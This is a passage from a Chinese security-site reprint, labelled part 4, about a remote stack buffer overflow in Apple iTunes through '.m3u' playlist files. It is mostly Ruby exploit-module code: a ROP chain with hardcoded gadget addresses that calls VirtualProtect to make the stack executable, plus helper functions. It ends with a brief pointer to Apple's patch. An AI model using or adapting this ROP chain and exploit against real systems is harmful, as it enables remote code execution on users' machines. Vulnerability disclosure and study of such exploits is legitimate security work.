Apple iTunes '.m3u'文件远程栈缓冲区溢出漏洞(4)

def gimme_rop()
       
        # thanx to mona.py :)
        rop_chain = [
            0x66c9a6c0,                     # POPAD / RET
            # registers
            0x66801044,                     # EDI: RET
            0x7c801ad4,                     # ESI: VirtualProtect [kernel32.dll]
            0x6697aa03,                     # EBP: JMP ESP
            junk,                           # skipped
            0x6c1703e8,                     # EBX: will become 0x3e8 after adding 0x93e90000 (dwSize)
            0xffffffd6,                     # EDX: will become 0x40 after adding 0x6a (flNewProtect)
            0x673650b0,                     # ECX: lpflOldProtect
            0x90909090,                     # EAX: nops
            # correct dwSize and flNewProtect
            0x66b7de1b,                     # ADD EBX, 0x93E90000 / RET
            0x66975c56,                     # ADD EDX, 0x6A / RET
            # throw it on the stack
            0x6684b5c6                      # PUSHAD / RET
        ].pack("V*")

return rop_chain

end

def junk
        return rand_text_alpha(4).unpack("L")[0].to_i
    end

def status(req,cli,action)
        print_status("Request for #{req.uri} from #{cli.peerhost}:#{cli.peerport}. #{action}")
    end


end

建议:
--------------------------------------------------------------------------------
厂商补丁:

Apple
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wwwgwg.html